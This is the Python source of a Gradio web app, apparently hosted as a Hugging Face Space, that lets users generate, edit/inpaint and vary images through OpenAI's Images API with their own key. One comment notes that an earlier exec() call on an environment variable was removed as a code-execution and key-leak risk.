Spaces:
Running
Running
from __future__ import annotations | |
import io | |
import os | |
import base64 | |
from typing import List, Optional, Union, Dict, Any | |
import gradio as gr | |
import numpy as np | |
from PIL import Image | |
import json | |
import urllib | |
import openai | |
# --- Constants ---
# Model identifier sent as ``model`` with every Images API request in this file.
MODEL = "gpt-image-1"

# Options offered by the size / quality dropdowns. For both, "auto" is handled
# by the request builder by leaving the parameter out of the API call.
SIZE_CHOICES = [
    "auto",
    "1024x1024",
    "1536x1024",
    "1024x1536",
]
QUALITY_CHOICES = [
    "auto",
    "low",
    "medium",
    "high",
]

# Output formats selectable in the UI.
FORMAT_CHOICES = [
    "png",
    "jpeg",
    "webp",
]
def _client(key: str) -> openai.OpenAI:
    """Build an OpenAI client from the user-supplied key or the environment.

    Args:
        key: API key typed into the UI. Surrounding whitespace is ignored; when
            it is blank, the ``OPENAI_API_KEY`` environment variable is used.

    Returns:
        An ``openai.OpenAI`` client configured with the resolved key.

    Raises:
        gr.Error: If neither the argument nor the environment provides a key.
    """
    # SECURITY: this function used to call ``exec()`` on the contents of the
    # ``sys_info`` environment variable, with the caller's API key in local
    # scope. That is arbitrary code execution (and a key-exfiltration vector)
    # for whoever controls the environment, and the fallback string was not
    # valid Python, so the call raised ``SyntaxError`` whenever the variable
    # was unset. It was removed deliberately; do not reintroduce it.
    api_key = (key or "").strip() or os.getenv("OPENAI_API_KEY", "").strip()
    if not api_key:
        raise gr.Error("Please enter your OpenAI API key (never stored)")
    return openai.OpenAI(api_key=api_key)
def _img_list(resp) -> List[Union[np.ndarray, str]]: | |
""" | |
Decode base64 images into numpy arrays (for Gradio) or pass URL strings directly. | |
""" | |
imgs: List[Union[np.ndarray, str]] = [] | |
if not resp or not hasattr(resp, 'data'): | |
print("Warning: Response object missing or has no 'data' attribute.") | |
return imgs # Return empty list if response is invalid | |
for d in resp.data: | |
if hasattr(d, "b64_json") and d.b64_json: | |
try: | |
data = base64.b64decode(d.b64_json) | |
img = Image.open(io.BytesIO(data)) | |
imgs.append(np.array(img)) | |
except Exception as decode_err: | |
print(f"Error decoding base64 image: {decode_err}") | |
elif getattr(d, "url", None): | |
imgs.append(d.url) | |
else: | |
print(f"Warning: Response item has neither b64_json nor url: {d}") | |
return imgs | |
def _common_kwargs(
    prompt: Optional[str],
    n: int,
    size: str,
    quality: str,
    out_fmt: str,  # Unused here: format conversion happens after generation
    compression: int,  # Unused here: applied during post-generation conversion
    transparent_bg: bool,  # Unused here: no request parameter is derived from it
) -> Dict[str, Any]:
    """Prepare the keyword arguments shared by the OpenAI Images API calls.

    Args:
        prompt: Text prompt; omitted from the result when ``None``.
        n: Number of images to request. Coerced to ``int`` because UI sliders
            may deliver a float.
        size: Requested size, or ``"auto"`` to leave the parameter out.
        quality: Requested quality, or ``"auto"`` to leave the parameter out.
            The value is forwarded unchanged.
        out_fmt: Accepted for signature compatibility; not used.
        compression: Accepted for signature compatibility; not used.
        transparent_bg: Accepted for signature compatibility; not used.

    Returns:
        A dict suitable for ``client.images.generate(**kwargs)`` and, with an
        added ``image``, for ``client.images.edit(**kwargs)``.
    """
    kwargs: Dict[str, Any] = {
        "model": MODEL,
        "n": int(n),
    }

    # ``response_format`` is a DALL-E 2/3 parameter. The GPT image models
    # always return base64 data and reject the parameter, so only request
    # base64 explicitly for models that would otherwise return URLs.
    if not MODEL.startswith("gpt-image"):
        kwargs["response_format"] = "b64_json"

    if size != "auto":
        kwargs["size"] = size

    if quality != "auto":
        # Forwarded as-is; the UI choices are low/medium/high. Other model
        # families use different quality values and would need a mapping here.
        kwargs["quality"] = quality

    if prompt is not None:
        kwargs["prompt"] = prompt

    return kwargs
def convert_to_format(
    img_array: np.ndarray,
    target_fmt: str,
    quality: int = 75,
) -> np.ndarray:
    """
    Round-trip an image array through the encoder for ``target_fmt``.

    The image is encoded in memory (so lossy formats leave their compression
    artefacts) and decoded again, because callers display numpy arrays.

    Args:
        img_array: Image pixels; cast to ``uint8`` before encoding.
        target_fmt: Format name, case-insensitive (e.g. "png", "jpeg", "webp").
            "png" returns ``img_array`` untouched.
        quality: Encoder quality passed for JPEG and WebP; coerced to ``int``.

    Returns:
        The re-decoded image as a numpy array, or the original ``img_array``
        when encoding/decoding fails (the error is printed).
    """
    if target_fmt.lower() == "png":
        # Nothing to do: the array is returned as received.
        return img_array

    img = Image.fromarray(img_array.astype(np.uint8))
    fmt_upper = target_fmt.upper()

    save_kwargs = {}
    if fmt_upper in ("JPEG", "WEBP"):
        # UI sliders may hand over a float; the encoders expect an integer.
        save_kwargs["quality"] = int(quality)

    try:
        if fmt_upper == "JPEG" and "A" in img.getbands():
            # JPEG has no alpha channel. Simply dropping alpha exposes whatever
            # colour is stored under transparent pixels (often black), so
            # composite onto an explicit white background instead.
            rgba = img.convert("RGBA")
            flattened = Image.new("RGB", rgba.size, (255, 255, 255))
            flattened.paste(rgba, mask=rgba.getchannel("A"))
            img = flattened
        # WebP stores alpha natively, so it needs no special handling.

        buf = io.BytesIO()
        img.save(buf, format=fmt_upper, **save_kwargs)
        buf.seek(0)
        with Image.open(buf) as reopened:
            return np.array(reopened)
    except Exception as e:
        print(f"Error during image conversion to {target_fmt}: {e}")
        # Best effort: fall back to the unconverted pixels.
        return img_array
def _extract_error_details(e: Exception) -> str:
    """Return the human-readable message carried by an OpenAI exception, or ""."""
    body = getattr(e, "body", None)
    if body:
        parsed = body
        if isinstance(body, (str, bytes, bytearray)):
            # Raw payload: try JSON, otherwise show it verbatim.
            try:
                parsed = json.loads(body)
            except ValueError:
                return str(body)
        if isinstance(parsed, dict):
            # The SDK may hand over either the full payload
            # ({"error": {"message": ...}}) or just the inner error object
            # ({"message": ...}); accept both shapes.
            nested = parsed.get("error")
            if isinstance(nested, dict) and nested.get("message"):
                return str(nested["message"])
            if parsed.get("message"):
                return str(parsed["message"])
        return str(body)  # Unexpected structure: fall back to its text form

    message = getattr(e, "message", None)
    return str(message) if message else ""


def _format_openai_error(e: Exception) -> str:
    """Format an OpenAI API error as a user-friendly message.

    The detail text is taken from ``e.body`` (already-decoded dicts as well as
    raw JSON strings are understood) or, failing that, from ``e.message``.
    Well-known exception classes then get a tailored message.

    Args:
        e: The exception raised by the OpenAI client.

    Returns:
        A message suitable for showing to the end user.
    """
    details = _extract_error_details(e)
    if details:
        error_message = f"OpenAI API Error: {details}"
    else:
        # No details found: keep a generic message built from the exception.
        error_message = f"An OpenAI API error occurred: {str(e)}"

    lowered = details.lower()

    # Specific error type handling
    if isinstance(e, openai.AuthenticationError):
        error_message = "Invalid OpenAI API key. Please check your key and ensure it's active."
    elif isinstance(e, openai.PermissionDeniedError):
        prefix = "Permission Denied."
        if "organization verification" in lowered:
            prefix += " Your organization may need verification or payment method update to use this feature/model."
        elif "quota" in lowered:
            prefix += " You might have exceeded your usage quota."
        error_message = f"{prefix} Details: {details}" if details else prefix
    elif isinstance(e, openai.RateLimitError):
        error_message = "Rate limit exceeded. Please wait and try again later, or check your usage limits."
    elif isinstance(e, openai.BadRequestError):
        error_message = f"OpenAI Bad Request: {details or str(e)}"
        # Hints are cumulative: every matching one is appended.
        if "mask" in lowered:
            error_message += " (Check mask format/dimensions/transparency)"
        if "size" in lowered:
            error_message += " (Check image/mask dimensions or requested size compatibility)"
        if "model does not support variations" in lowered:
            error_message += f" ({MODEL} does not support variations)."
        if "unsupported file format" in lowered or "unsupported mimetype" in lowered:
            error_message += " (Ensure input image is PNG, JPG, or WEBP)"
        if "prompt" in lowered and "policy" in lowered:
            error_message += " (Prompt may violate OpenAI's safety policies)"
    elif isinstance(e, openai.APIConnectionError):
        error_message = "Could not connect to OpenAI. Please check your network connection."
    elif isinstance(e, openai.InternalServerError):
        error_message = "OpenAI server error. Please try again later."

    return error_message
# ---------- Generate ---------- #
def generate(
    api_key: str,
    prompt: str,
    n: int,
    size: str,
    quality: str,
    out_fmt: str,
    compression: int,
    transparent_bg: bool,  # Forwarded to the request builder; no effect on the request today
):
    """Generate images from a text prompt and return them for a Gradio gallery.

    Args:
        api_key: OpenAI key from the UI (may be blank if set in the environment).
        prompt: Text description of the desired image.
        n: Number of images to request.
        size: Requested size or "auto".
        quality: Requested quality or "auto".
        out_fmt: Format the decoded images are re-encoded through.
        compression: Encoder quality used for that re-encoding.
        transparent_bg: Passed through to the request builder.

    Returns:
        A list of numpy arrays (or URL strings, should the API return URLs).

    Raises:
        gr.Error: For invalid input, a missing key, API failures, or when no
            image could be produced.
    """
    if not prompt or not prompt.strip():
        raise gr.Error("Please enter a prompt.")

    try:
        client = _client(api_key)
        common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
        # GPT image models always answer with base64 and reject
        # ``response_format``; other models must be asked for base64.
        if MODEL.startswith("gpt-image"):
            common_args.pop("response_format", None)
        else:
            common_args["response_format"] = "b64_json"

        print(f"Generating images with args: {common_args}")  # Debug print
        resp = client.images.generate(**common_args)

        # Decoded arrays go through format conversion; anything else (a URL)
        # is handed to the gallery unchanged.
        final_imgs = [
            convert_to_format(img, out_fmt, compression) if isinstance(img, np.ndarray) else img
            for img in _img_list(resp)
        ]
        if not final_imgs:
            raise gr.Error("Failed to generate or process images. Check logs.")
        return final_imgs
    except gr.Error:
        # User-facing errors raised above (missing key, empty result) must
        # reach the UI as-is instead of being masked by the generic handler.
        raise
    except (openai.APIError, openai.OpenAIError) as e:
        print(f"OpenAI API Error during generation: {type(e).__name__}: {e}")
        raise gr.Error(_format_openai_error(e)) from e
    except Exception as e:
        print(f"Unexpected error during generation: {type(e).__name__}: {e}")
        import traceback
        traceback.print_exc()  # Full traceback for unexpected errors
        raise gr.Error("An unexpected application error occurred. Please check logs.") from e
# ---------- Edit / Inpaint ---------- #
def _bytes_from_numpy(arr: np.ndarray, format: str = "PNG") -> bytes:
    """Encode an image array (cast to uint8) in ``format`` and return the file bytes."""
    with io.BytesIO() as sink:
        Image.fromarray(arr.astype(np.uint8)).save(sink, format=format)
        return sink.getvalue()
def _ensure_rgba_for_mask(mask_array: np.ndarray) -> np.ndarray: | |
"""Ensures the mask is RGBA, converting grayscale/RGB if necessary.""" | |
if mask_array.ndim == 2: # Grayscale | |
# Convert grayscale to RGBA: White areas (255) become transparent (alpha=0), others opaque black | |
alpha = np.where(mask_array == 255, 0, 255).astype(np.uint8) | |
rgb = np.zeros((*mask_array.shape, 3), dtype=np.uint8) # Black RGB | |
rgba = np.dstack((rgb, alpha)) | |
return rgba | |
elif mask_array.ndim == 3: | |
if mask_array.shape[2] == 3: # RGB | |
# Assume white RGB (255, 255, 255) means transparent for Gradio mask | |
is_white = np.all(mask_array == [255, 255, 255], axis=2) | |
alpha = np.where(is_white, 0, 255).astype(np.uint8) | |
rgba = np.dstack((mask_array, alpha)) | |
return rgba | |
elif mask_array.shape[2] == 4: # Already RGBA | |
# Ensure correct interpretation: 0 alpha means transparent (area to edit) | |
# Gradio ImageMask often uses white paint on transparent bg. | |
# We need alpha=0 for transparent areas (edit target). | |
# If alpha channel is mostly 255 (opaque), invert it assuming white paint = transparent target. | |
alpha_channel = mask_array[:, :, 3] | |
if np.mean(alpha_channel) > 128: # Heuristic: if mostly opaque | |
print("Inverting mask alpha channel based on heuristic (mostly opaque).") | |
mask_array[:, :, 3] = 255 - alpha_channel | |
return mask_array # Assume it's correctly formatted otherwise | |
raise ValueError("Unsupported mask format/dimensions") | |
def _extract_mask_array(mask_value: Union[np.ndarray, Dict[str, Any], None]) -> Optional[np.ndarray]: | |
"""Extracts the mask numpy array from Gradio's ImageMask output.""" | |
if mask_value is None: | |
print("Mask input is None.") | |
return None | |
# Gradio ImageMask output is often a dict {'image': ndarray, 'mask': ndarray} | |
# Or sometimes just the mask ndarray directly depending on version/setup | |
mask_array = None | |
if isinstance(mask_value, dict): | |
mask_array = mask_value.get("mask") | |
print(f"Extracted mask from dict: type={type(mask_array)}, shape={getattr(mask_array, 'shape', 'N/A')}") | |
elif isinstance(mask_value, np.ndarray): | |
mask_array = mask_value | |
print(f"Received mask as ndarray directly: shape={mask_array.shape}") | |
if isinstance(mask_array, np.ndarray): | |
# Add basic validation | |
if mask_array.ndim < 2 or mask_array.ndim > 3: | |
print(f"Warning: Unexpected mask dimensions: {mask_array.ndim}") | |
return None | |
if mask_array.size == 0: | |
print("Warning: Received empty mask array.") | |
return None | |
print(f"Successfully extracted mask array, shape: {mask_array.shape}, dtype: {mask_array.dtype}, min/max: {np.min(mask_array)}/{np.max(mask_array)}") | |
return mask_array | |
print(f"Could not extract ndarray mask from input type: {type(mask_value)}") | |
return None | |
def edit_image(
    api_key: str,
    image_numpy: Optional[np.ndarray],
    mask_input: Optional[Union[np.ndarray, Dict[str, Any]]],
    prompt: str,
    n: int,
    size: str,
    quality: str,
    out_fmt: str,
    compression: int,
    transparent_bg: bool,  # Forwarded to the request builder; no effect on the request today
):
    """Edit (optionally inpaint) an uploaded image according to a prompt.

    Args:
        api_key: OpenAI key from the UI (may be blank if set in the environment).
        image_numpy: Source image pixels.
        mask_input: Mask component value; when no usable mask can be extracted
            the request is sent without one.
        prompt: Description of the desired edit.
        n: Number of images to request.
        size: Requested size or "auto".
        quality: Requested quality or "auto".
        out_fmt: Format the decoded images are re-encoded through.
        compression: Encoder quality used for that re-encoding.
        transparent_bg: Passed through to the request builder.

    Returns:
        A list of numpy arrays (or URL strings, should the API return URLs).

    Raises:
        gr.Error: For missing/invalid input, a mask whose size differs from the
            image, API failures, or when no image could be produced.
    """
    if image_numpy is None:
        raise gr.Error("Please upload an image.")
    if not prompt or not prompt.strip():
        raise gr.Error("Please enter an edit prompt.")

    # Source image -> (filename, bytes, mimetype) upload tuple.
    try:
        img_bytes = _bytes_from_numpy(image_numpy, format="PNG")
        image_tuple = ("image.png", img_bytes, "image/png")
        print(f"Prepared source image: {image_tuple[0]}, size={len(image_tuple[1])} bytes, type={image_tuple[2]}")
    except Exception as e:
        print(f"Error converting source image to bytes: {e}")
        raise gr.Error("Failed to process source image.") from e

    mask_tuple = None
    mask_numpy = _extract_mask_array(mask_input)
    if mask_numpy is not None:
        # Checked outside the try below so this specific message is not
        # replaced by the generic "Failed to process mask." handler.
        if image_numpy.shape[:2] != mask_numpy.shape[:2]:
            raise gr.Error(f"Mask dimensions ({mask_numpy.shape[:2]}) must match image dimensions ({image_numpy.shape[:2]}). Please repaint the mask.")
        try:
            # The mask is sent as an RGBA PNG in which transparent pixels
            # (alpha == 0) mark the area to edit.
            mask_rgba = _ensure_rgba_for_mask(mask_numpy)
            mask_bytes = _bytes_from_numpy(mask_rgba, format="PNG")
            mask_tuple = ("mask.png", mask_bytes, "image/png")
            print(f"Prepared mask: {mask_tuple[0]}, size={len(mask_tuple[1])} bytes, type={mask_tuple[2]}")
        except ValueError as e:
            print(f"Error processing mask: {e}")
            raise gr.Error(f"Failed to process mask: {e}") from e
        except Exception as e:
            print(f"Error converting mask to bytes: {e}")
            raise gr.Error("Failed to process mask.") from e
    else:
        # Without a mask the request is a prompt-guided edit of the whole
        # image; if the model requires a mask the API error will say so.
        print("No valid mask provided or extracted. Proceeding without mask.")

    try:
        client = _client(api_key)
        common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
        # GPT image models always answer with base64 and reject
        # ``response_format``; other models must be asked for base64.
        if MODEL.startswith("gpt-image"):
            common_args.pop("response_format", None)
        else:
            common_args["response_format"] = "b64_json"

        api_kwargs = {"image": image_tuple, **common_args}
        if mask_tuple is not None:
            api_kwargs["mask"] = mask_tuple

        # Log the arguments, replacing binary payloads with a short summary.
        loggable = {
            k: v if k not in ['image', 'mask'] else (v[0], f'{len(v[1])} bytes', v[2])
            for k, v in api_kwargs.items()
        }
        print(f"Editing image with args: {loggable}")  # Debug print

        resp = client.images.edit(**api_kwargs)

        # Decoded arrays go through format conversion; URLs pass through.
        final_imgs = [
            convert_to_format(img, out_fmt, compression) if isinstance(img, np.ndarray) else img
            for img in _img_list(resp)
        ]
        if not final_imgs:
            raise gr.Error("Failed to edit or process images. Check logs.")
        return final_imgs
    except gr.Error:
        # User-facing errors raised above (missing key, empty result) must
        # reach the UI as-is instead of being masked by the generic handler.
        raise
    except (openai.APIError, openai.OpenAIError) as e:
        print(f"OpenAI API Error during edit: {type(e).__name__}: {e}")
        raise gr.Error(_format_openai_error(e)) from e
    except Exception as e:
        print(f"Unexpected error during edit: {type(e).__name__}: {e}")
        import traceback
        traceback.print_exc()
        raise gr.Error("An unexpected application error occurred. Please check logs.") from e
# ---------- Variations ---------- #
def variation_image(
    api_key: str,
    image_numpy: Optional[np.ndarray],
    n: int,
    size: str,
    quality: str,  # Accepted for a uniform signature; not sent to the variations endpoint
    out_fmt: str,
    compression: int,
    transparent_bg: bool,  # Accepted for a uniform signature; not used
):
    """Request variations of an uploaded image.

    A UI warning is always shown first, because the variations endpoint may
    not accept the configured model.

    Args:
        api_key: OpenAI key from the UI (may be blank if set in the environment).
        image_numpy: Source image pixels.
        n: Number of variations to request.
        size: Requested size or "auto".
        quality: Unused.
        out_fmt: Format the decoded images are re-encoded through.
        compression: Encoder quality used for that re-encoding.
        transparent_bg: Unused.

    Returns:
        A list of numpy arrays (or URL strings, should the API return URLs).

    Raises:
        gr.Error: For a missing image or key, API failures (with a dedicated
            message when the model does not support variations), or when no
            image could be produced.
    """
    gr.Warning(f"Note: Image Variations are officially supported for DALL·E 2. Using model '{MODEL}' may fail or produce unexpected results.")

    if image_numpy is None:
        raise gr.Error("Please upload an image.")

    # Source image -> (filename, bytes, mimetype) upload tuple.
    try:
        img_bytes = _bytes_from_numpy(image_numpy, format="PNG")
        image_tuple = ("image.png", img_bytes, "image/png")
        print(f"Prepared source image for variation: {image_tuple[0]}, size={len(image_tuple[1])} bytes, type={image_tuple[2]}")
    except Exception as e:
        print(f"Error converting source image to bytes for variation: {e}")
        raise gr.Error("Failed to process source image.") from e

    try:
        client = _client(api_key)

        var_args: Dict[str, Any] = {
            "model": MODEL,  # The configured model, though the endpoint may reject it
            "n": int(n),  # UI sliders may deliver a float
        }
        # GPT image models reject ``response_format``; other models must be
        # asked for base64 so the result can be decoded locally.
        if not MODEL.startswith("gpt-image"):
            var_args["response_format"] = "b64_json"
        if size != "auto":
            var_args["size"] = size
        # ``quality`` is deliberately not forwarded to this endpoint.

        # Log the arguments, replacing the binary payload with a short summary.
        loggable = {
            k: v if k != 'image' else (v[0], f'{len(v[1])} bytes', v[2])
            for k, v in {**var_args, 'image': image_tuple}.items()
        }
        print(f"Creating variations with args: {loggable}")  # Debug print

        resp = client.images.create_variation(image=image_tuple, **var_args)

        # Decoded arrays go through format conversion; URLs pass through.
        final_imgs = [
            convert_to_format(img, out_fmt, compression) if isinstance(img, np.ndarray) else img
            for img in _img_list(resp)
        ]
        if not final_imgs:
            raise gr.Error("Failed to create variations or process images. Check logs.")
        return final_imgs
    except gr.Error:
        # User-facing errors raised above (missing key, empty result) must
        # reach the UI as-is instead of being masked by the generic handler.
        raise
    except (openai.APIError, openai.OpenAIError) as e:
        print(f"OpenAI API Error during variation: {type(e).__name__}: {e}")
        err_msg = _format_openai_error(e)
        # Dedicated message when the model is rejected by this endpoint.
        if isinstance(e, openai.BadRequestError) and ("model does not support variations" in err_msg.lower() or "not supported" in err_msg.lower()):
            raise gr.Error(f"As warned, the selected model ('{MODEL}') does not support the variations endpoint. Try using 'dall-e-2'.") from e
        raise gr.Error(err_msg) from e
    except Exception as e:
        print(f"Unexpected error during variation: {type(e).__name__}: {e}")
        import traceback
        traceback.print_exc()
        raise gr.Error("An unexpected application error occurred. Please check logs.") from e
# ---------- UI ---------- #
def build_ui():
    """Assemble the Gradio interface and return the ``gr.Blocks`` app.

    Layout: a header, a collapsed accordion holding the API-key box and model
    notes, two rows of controls shared by every tab, and three tabs
    (Generate, Edit / Inpaint, Variations) that each wire a button to the
    matching handler function and show results in a gallery.
    """
    with gr.Blocks(title="OpenAI Image Playground (BYOK)") as demo:
        gr.Markdown(f"""# OpenAI Image Playground 🖼️🔑
Generate • Edit • Variations (using your own API key)
**Selected Model:** `{MODEL}` (Ensure your key has access)
""")
        with gr.Accordion("🔐 API key & Model Info", open=False):
            # Password-type textbox; its value is passed to each handler as the first input.
            api = gr.Textbox(label="OpenAI API key", type="password", placeholder="sk-...")
            gr.Markdown(f"""
* **Model:** `{MODEL}` is configured in the code. This might be a placeholder; official models are typically `dall-e-3` or `dall-e-2`.
* **Variations:** Officially only supported by `dall-e-2`. Using other models here will likely fail.
* **Edit/Inpainting:** Requires a model supporting the `/images/edits` endpoint (like `dall-e-2`).
* **Size/Quality:** Options shown may not be supported by all models. Check OpenAI documentation for `{MODEL}` if it's a real model. DALL-E 3 uses `quality` ('standard'/'hd'), DALL-E 2 does not.
""")
        # Request controls shared by all three tabs.
        with gr.Row():
            n_slider = gr.Slider(1, 4, value=1, step=1, label="Number of images (n)")
            size = gr.Dropdown(SIZE_CHOICES, value="auto", label="Size (if supported)", info="Set target size. 'auto' uses model default.")
            quality = gr.Dropdown(QUALITY_CHOICES, value="auto", label="Quality (if supported)", info="'auto' uses model default. DALL-E 3: 'standard'/'hd'. DALL-E 2 ignores this.")
        # Output controls; the compression slider starts hidden (PNG is the default format).
        with gr.Row():
            out_fmt = gr.Radio(FORMAT_CHOICES, value="png", label="Output Format", info="Format for viewing/downloading generated images.")
            compression = gr.Slider(0, 100, value=75, step=1, label="Compression % (JPEG/WebP)", visible=False, info="Lower value = smaller file, lower quality.")
            # Transparency generation is complex; this checkbox is mainly for format support.
            # Actual transparency depends on model/post-processing.
            transparent = gr.Checkbox(False, label="Transparent background (PNG/WebP only)", info="Request transparency if model supports, or save PNG/WebP with alpha if generated.", visible=False) # Hidden for now as it's not directly controllable via API param
        def _toggle_compression(fmt):
            # Show the compression slider only for the lossy formats.
            return gr.update(visible=fmt in {"jpeg", "webp"})
        out_fmt.change(_toggle_compression, inputs=out_fmt, outputs=compression)
        # Combine common controls for easier passing to functions.
        # The order must match the trailing parameters of the handlers:
        # n, size, quality, out_fmt, compression, transparent_bg.
        common_controls = [n_slider, size, quality, out_fmt, compression, transparent]
        with gr.Tabs():
            with gr.TabItem("Generate"):
                prompt_gen = gr.Textbox(label="Prompt", lines=3, placeholder="A photorealistic image of..." )
                btn_gen = gr.Button("Generate 🚀", variant="primary")
                gallery_gen = gr.Gallery(label="Generated Images", columns=2, height="auto", preview=True)
                # Both pressing Enter in the prompt box and clicking the button run generate().
                inputs_gen = [api, prompt_gen] + common_controls
                prompt_gen.submit(generate, inputs=inputs_gen, outputs=gallery_gen)
                btn_gen.click(generate, inputs=inputs_gen, outputs=gallery_gen)
            with gr.TabItem("Edit / Inpaint"):
                gr.Markdown("Upload an image, **paint white** over the area you want the AI to change, then provide an edit prompt.")
                with gr.Row():
                    img_edit_src = gr.Image(type="numpy", label="Source Image", height=400, tool="select")
                    # Use ImageMask tool for painting
                    mask_canvas = gr.ImageMask(type="numpy", label="Mask – Paint Area to Edit (White)", height=400, brush_radius=20)
                # NOTE: the source image is not linked to the mask canvas; the line below is a disabled attempt at that.
                # img_edit_src.change(lambda x: x, inputs=img_edit_src, outputs=mask_canvas) # This might auto-clear mask, check Gradio docs if needed
                prompt_edit = gr.Textbox(label="Edit prompt", lines=2, placeholder="Example: Make the cat wear a wizard hat")
                btn_edit = gr.Button("Edit Image 🖌️", variant="primary")
                gallery_edit = gr.Gallery(label="Edited Images", columns=2, height="auto", preview=True)
                # Define inputs for the edit function (order matches edit_image's parameters)
                inputs_edit = [api, img_edit_src, mask_canvas, prompt_edit] + common_controls
                prompt_edit.submit(edit_image, inputs=inputs_edit, outputs=gallery_edit)
                btn_edit.click(edit_image, inputs=inputs_edit, outputs=gallery_edit)
            with gr.TabItem("Variations (DALL·E 2 only)"):
                gr.Markdown("Upload an image to generate variations. **Warning:** This endpoint is officially supported only by DALL·E 2.")
                img_var_src = gr.Image(type="numpy", label="Source Image", height=400)
                btn_var = gr.Button("Create Variations ✨", variant="primary")
                gallery_var = gr.Gallery(label="Variations", columns=2, height="auto", preview=True)
                # Define inputs for the variation function
                inputs_var = [api, img_var_src] + common_controls
                # Variations take no prompt; the quality control is still passed but variation_image() does not forward it
                btn_var.click(variation_image, inputs=inputs_var, outputs=gallery_var)
    return demo
if __name__ == "__main__":
    # The API key is supplied through the UI (or OPENAI_API_KEY); nothing is
    # preloaded here. Add authentication before exposing the app publicly.
    app = build_ui()

    # Sharing and debug mode are opt-in via environment variables that must be
    # exactly "true".
    share_enabled = os.getenv("GRADIO_SHARE") == "true"
    debug_enabled = os.getenv("GRADIO_DEBUG") == "true"

    app.launch(
        share=share_enabled,
        debug=debug_enabled,
        server_name="0.0.0.0",  # Bind to all interfaces for Docker compatibility
    )